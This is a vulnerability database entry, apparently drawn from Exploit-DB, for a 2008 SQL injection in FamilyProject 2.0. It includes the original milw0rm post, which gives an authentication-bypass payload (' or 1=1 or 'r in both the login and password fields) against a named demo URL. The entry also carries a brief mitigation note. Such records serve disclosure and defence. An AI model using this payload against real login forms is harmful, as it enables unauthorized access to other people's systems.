Mor0ccan nightamres

vendor:

FamilyProject

by:

The_5p3ctrum

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: FamilyProject

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:mjcreation:familyproject

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The familyproject script version 2.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a specially crafted login and password to the application. For example, login: ' or 1=1 or 'r and pass: ' or 1=1 or 'r can be used to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

--------------------------------------Mor0ccan nightamres---------------------------------------------
Script     : familyproject

V3rs!0n    : 2.0

Download   : http://www.mjcreation.fr/familyproject/

Auth0r    : The_5p3ctrum
-----------------------------------------------------------------------------------

demo Exploit    :

http://www.mjcreation.fr/familyproject/demo/index.php

login : ' or 1=1 or 'r
pass  : ' or 1=1 or 'r

-----------------------------------------------------------------------------------

Greets :

str0ke  ,  Bayhay  ,  Cyber-Zone  , Mor0ccan nightamres

-----------------------------------------------------------------------------------

# milw0rm.com [2008-11-27]